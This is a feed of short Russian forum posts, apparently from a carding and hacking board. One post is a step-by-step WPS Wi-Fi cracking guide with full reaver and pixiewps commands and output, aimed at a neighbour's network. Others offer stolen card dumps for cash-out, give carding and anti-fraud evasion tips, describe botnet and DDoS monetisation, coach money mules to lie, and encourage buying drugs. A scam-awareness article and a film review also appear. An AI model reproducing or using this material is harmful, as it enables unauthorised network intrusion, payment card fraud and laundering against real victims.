вышеперечисленные возможности, для того чтобы майнить криптовалюты( к примеру биткоин), это самое распространенное использование ботнета сейчас изза растущей популярности и стоимости криптовалют Контроль и использование сети довольно часто происходит не самими хакерами. а компаниями которые у них их купили, например для уничтожение конкурентов, дудос сайтов конкурента и прочие варианты коммерческого использования и монетизации сети бонет.
-
1 баллСпасибо за мануал, все обьяяснили достпуно , помогли настроить ПК , держали связь практически 24\7 даже на мои детские вопросы отвечали
-
1 балл
-
1 баллВсе четко , но доставка заняла длительное время , хотелось бы что бы она была чуть шустрее
-
1 балл
-
1 баллЛично работал с Dioop парень знает толк в своем деле. Амиго ты мне помог в трудную минуту,я этого не забуду!Ручаюсь за Бразе.Всех благ в работе тебе!!!
-
1 баллСегодня я хочу рассказать как взломать WiFi WPA/WPA2 (WPS ATTACK) нам нужно будет: Linux (у меня стоит Kali Linux, наиболее удобна так как большинство утилит вшиты) Сетевая карта (PCI или USB не имеет значения, у меня PCI) Утилиты, которые потребуются уже вшиты в ОС. Но тем, у кого обычный линукс надо скачать вот эти утилиты - aircrack, wifite, reaver, pixiewps. Если все готово, то начинаем. Открываем терминал и пишем: airmon-ng - определяем наш беспроводной интерфейс. У каждого своя ситуация, в моем случае wlan0 Далее пишем следующее: airmon-ng start wlan0 - переводим в режим мониторинга. ВНИМАНИЕ название вашего интерфейса может изменится, в моем случае стало wlan0mon. После этого обычно остаются процессы, которые могут помешать их надо удалить используя kill **** (вместо **** id процесса) Теперь необходимо просканировать наше вайфай пространство: airodump-ng wlan0mon Используя утилиту wifite определим одну важную вещь(кстати, используя эту утилиту можно хакнуть вайфай без других утилит, но мне она не подходит): wifite запускается сканирование, выбираем сеть с включенным WPS. Но для того, чтобы все прошло успешно надо что бы в выбранной нами сети был клиент, без подключенного клиента это пустая трата времени. Если что, дожидаемся его появления. Wifite больше не пригодится. Взламывать WPS будем, используя reaver: reaver Далее: reaver -i wlan0mon -b F8:C0:91:14:C7:6B после -b должен быть bssid выбранной вами сети(смотрим в airodump-ng) Reaver начинает взлом, придется подождать пока не появятся E-Hash1 и E-Hash2 Итак, reaver закончил работу, но WPS PIN не появился, а появились данные о роутере все в норме. Тут то нам и нужен pixiewps: pixiewps Далее смотрим пример: pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 59:1f:11:57:8b:52:61:40:63:fe:8d:e3:3d:04:36:a5:74:43:01:c6:a7:4a:06:60:2f:3c:c5:d3:87:7c:c0:d4:7a:d3:6b:09:f7:c5:5c:b5:18:62:13:b6:0c:79:3c:8f:58:97:e7:0c:b7:47:3d:6c:60:21:6c:d3:bc:a7:62:05:80:6b:a7:9c:b2:26:b5:62:37:7b:7c:08:24:93:15:87:bb:ff:ed:3f:6a:33:54:4c:a1:a0:1b:2e:2e:d2:35:e8:5d:72:55:77:57:97:ef:9a:c0:2f:c1:20:cf:de:a9:7b:e2:eb:70:a5:86:4d:03:72:ec:5c:82:d9:a4:70:44:3a:30:3a:63:6a:8d:39:c8:5e:71:1f:66:ab:4d:89:6d:e7:98:36:91:1e:e4:fc:2a:e6:c9:3b:9b:88:80:be:6a:04:d0:7b:43:2b:26:4e:62:4c:ea:01:7d:1e:90:a2:ba:33:29:b3:94:0b:20:02:9f:55:05:d3:68:d2:26:41:9c:2e -s 99:98:3e:42:0c:88:55:58:e2:97:cc:86:db:2a:ba:89:d9:6b:55:d9:7b:9a:1b:c3:93:a9:c8:70:35:4c:0a:7b -z f4:d3:c8:f0:64:24:e5:da:a9:97:16:4b:58:3d:41:15:76:15:5b:01:9e:1e:77:81:ab:55:6d:7e:82:8d:71:d8 -a 95:c5:07:7a:ef:d1:f9:d7:6d:6d:44:6d:57:c5:d9:59:c6:60:4d:bf:de:34:cc:8f:94:d8:b8:e1:74:0f:0b:18 -n 02:cc:48:b6:5c:b4:1f:2d:54:b2:27:67:3d:29:70:8f Что получилось в итоге: Pixiewps 1.1 [*] E-S1: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [*] E-S2: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [+] WPS pin: 99956042 [*] Time taken: 1 s Итак, мы получили WPS PIN используя который можем подключится к взломаной сетке. Чтобы подключиься вводим WPS PIN вместо пароля. Ну вроде все!)Удачи взломать соседкий Wi Fi,но не забывайте это уголовно наказуемо!
-
1 балл
-
1 балл
-
1 балл
-
1 баллДо кило баксов смело закидывайся стаффом)))нахер ты копам сдался,больше гемора будет им стоить это дело с тобой
-
1 баллРипперы - разновидность сетевых мошенников, промышляющих в интернете. Как правило занимаются разводом на доверии, например продажа несуществующих товаров по предоплате
-
1 баллБывает, что обнуляется БМЛ на следующий день даже если ничего не делаешь с ним. Так что вряд ли это из за твоих действий. Скорее всего палка прогоняет все данные еще через какие-то дополнительные проверки, которые невозможно сделать за те несколько секунд пока рассматривается заявка на БМЛ и если что не так, то обнуляет кредитную линию. Мне показалось, что в последнее время это стало намного чаще происходить, раньше намного реже случалось такое, чтобы обнулился БМЛ. Возможно усилили антифрод, подзадрочили тему уже.
-
1 баллпрвиет где ваши работы или отзывы скрины и т.д а то вчера смотрел скрины одного умельца
-
1 баллДД всем данный торговец вчера произвел со мной трейд за место того что должно было быть в посылке он выслал совсем другой товар.а после того как выслал сразу ушел в оффлайн и более до сегодня не появлялся7 крайне не рекомендую его
-
1 баллВсе очень просто. В налоговой после регистрации вас должны были прикрепить к инспектору, спросите у него кто занимается ККМ. Этот человек должен дать вам все подробные инструкции. Где купить и как оформить. Но учтите, даже если вы не будете какое-то время использовать ККМ, но заведете ее вам придется платить за обслуживание. Сейчас, если не ошибаюсь это около 700 руб. в месяц. Если вы будете совершать операции без ККМ вы рискуете нарваться на штраф 40000 руб. Есть способ не использовать ККМ. Есть документ (кажется закон) о бланках строгой отчетности. Да, в законе о ККМ, есть перечень операций по которым можно принимать оплату с использованием БСО. Есть специально утвержденные формы. Нужную вам должны дать в налоговой. Вы заказываете их печать в типографии (не все типографии имеют право печатать БСО), регистриркуете их приход в спец. журнале и работаете.
-
1 баллДам дампы на обнал. Выборку сделаю по Вашим бинам ) Дампы БЕЗ пинов. 60% Вам!!! , Прошу стучять толька Проверенным людям Аська или в пм
-
1 баллНе знаю как у вас, был я в Итальянском максраке, расплачивался своей картой и пин не требовался!!
-
1 балл
-
1 балл
-
1 балля пробовал, бины без вбв через http://2pay.us.com/oplata/g2s/?id=195 ид что платить, ну там антифрауд хороший, после вбива чистим куки и меняем ип
-
1 балл
-
1 баллAmanda, мне кажется реально. Сам видел как в Штатах как некоторые продавцы принимали платежи следующим образом: карта вставляется в нехитрый станок размером чуть больше канцелярского дырокола, прокатывается через копирку, т.е. делается копия лицевой стороны на бланке. Далее туда вписывается сумма и холдер ставит подпись. Всё. Наверняка сейчас систему модернизировали, но смысл тот же.
-
1 балл
-
1 баллНемного хотел бы описать о ходе своих действий Зарегистрировал 3g модем на несуществующую личность. Поднимаю свой ВПН на панамском VPS (Собственно в правилах написано, что можно делать все что не нарушает законы Панамы, а значит все.)
-
1 балл
-
1 баллБЛИН! ну вы тут все ЗЛОДЕИ! до паранои хотите довести?! Кроме очевидных вещей есть что сказать ?
-
1 баллДа происхождение денег перечисляемых на аккаунты теперь везде спрашивают...даже при покупке оффшора. Ну конечно 2к совсем мало для выяснения деталей транзакции. Дропу надо было обложить всех, и сказать что он нетрадиционной ориентации и у него есть русский любовник, который перечисляет ему средства в качестве "подарка", сказать об ущемлении его человеческих прав и еще какую нибудь куйню, можно даже слезу пустить (легко получится).
-
1 баллПотому что ни разу не работал... Свои деньги привык держать при себе Кому действительно надо купит и без гарантов
-
1 баллВ свете мирового финансового кризиса участились случаи мошеннических операций, осуществляемых при помощи e-mail и sms-сообщений. Специалисты подсчитали, что за год в ловушку мошенников попадает примерно 3 млн человек, а по мере ухудшения экономической ситуации цифра будет расти. В связи с этим издание Daily Telegraph опубликовало пять самых распространенных мошеннических схем и способы, как их избежать. По подсчетам британской организации Управление добросовестной конкуренции (Office of Fair Trading - OFT), примерно 3 млн людей в год становятся жертвами мошеннических операций, осуществляемых с помощью почты, e-mail и sms-сообщений. Специалисты опасаются, что по мере углубления финансового кризиса цифра эта будет только расти. Чтобы помочь людям избежать капканов, расставленных мошенниками, OFT начинает месяц борьбы с махинациями. Рой Гайнсфорд, генеральный директор Института торговых стандартов (Trading Standards Institute - TSI), советует каждому, кто получает слишком заманчивое, чтобы быть правдой, предложение, задуматься и задать себе вопрос: "А им-то это зачем?". Издание Daily Telegraph опубликовало пять самых распространенных мошеннических схем и советы, как их избежать. 1. Фальшивые лотереи и розыгрыши призов Существует два типа фальшивых лотерей. Первый: вы получаете письмо, оповещающее вас о крупном выигрыше, для получения которого вам необходимо отправить небольшой взнос. Правда, если вы прочитаете то, что написано мелким шрифтом, то поймете, что этот незначительный взнос дает вам только право на участие в розыгрыше. Вариант второй: вам говорят, что вы выиграли приз, но для того, чтобы его получить, вы должны сделать заказ из каталога. И снова та же история с мелким шрифтом. Если вы получаете оповещение о выигрыше, вы должны внимательно изучить его. Участвовали ли вы в каком-то розыгрыше сознательно? Содержится ли в письме просьба о взносе? По данным OFT, на эту нехитрую удочку ежегодно попадается около 500 тыс. человек, которые в общей сложности приносят мошенникам 320 млн фунтов. 2. Иностранная лотерея Ежедневно тысячи британцев узнают, что выиграли тысячи миллионов фунтов в какой-то иностранной лотерее. В таких письмах вас тоже просят внести взнос, но приза при этом не существует. Настоящая испанская лотерея под названием El Gordo выступила с предостережением, что письма от ее имени могут рассылать мошенники. Если вы не покупали лотерейный билет El Gordo, то вы в ней не могли выиграть, предупреждают организаторы. 3. Предварительная оплата Если вы получили письмо с грамматическими ошибками, в котором кто-то, кого вы не знаете, просит вас о чем-то, вы стали мишенью мошенников. Сообщение такого рода может прийти по обычной или электронной почте, по факсу или по телефону. Обычно в нем идет речь о какой-то сумме денег, которая нужна вашему корреспонденту, чтобы выбраться из своей страны. Жертве, то есть вам, предлагают крупное вознаграждение в качестве благодарности за оказанную помощь. Автор такого письма обычно представляется каким-то высокопоставленным чиновником или родственником умершего или свергнутого политика. Первыми в таком жанре были письма "из Нигерии". Этот обратный адрес довольно часто встречается в них и по сей день, правда, в последнее время варианты стали разнообразнее. Так, недавно в Великобритании были замечены подобного рода письма из России. 4. Работа на дому/деловые предложения Чем выше будет безработица, тем популярнее будет становиться эта схема. Как правило, в таком случае вам предлагают высокий заработок за нетрудную работу вроде заполнения конвертов. Традиционно подчеркивается, что вы можете работать дома "в удобное для вас время". Если вы на это купитесь, то потом обнаружите, что вам еще надо тратить свои деньги на ксерокопирование, вырезать рекламу из газет или покупать программы. А может и вовсе оказаться, что вы участвуете в пирамиде, в которую деньги поступают только за счет новых жертв. 5. Инвестиционные схемы Вам предлагают акции или проценты от прибыли какой-то компании. Согласно данным Управления финансового надзора, даже самые опытные инвесторы попадаются на эту удочку. Тревожным сигналом должна стать неожиданность такого предложения, особенно, если компания находится за границей. Проверьте, зарегистрирована ли эта компания официальными органами.
-
1 балл«Отпетые мошенники» — фильм 1988 года с Стивом Мартином и Майклом Кейном в главных ролях, реж. Фрэнк Оз (США) Это легендарный фильм, очень воодушевляет и завораживает! Мой любимый фильм, пересматриваю стабильно раз в пол года) Посмотрите! Не пожалеете. Бесподобная игра актеров, искрометный юмор, на протяжении всего просмотра, улыбка с лица не сходит э
-
1 балл
-
1 балл
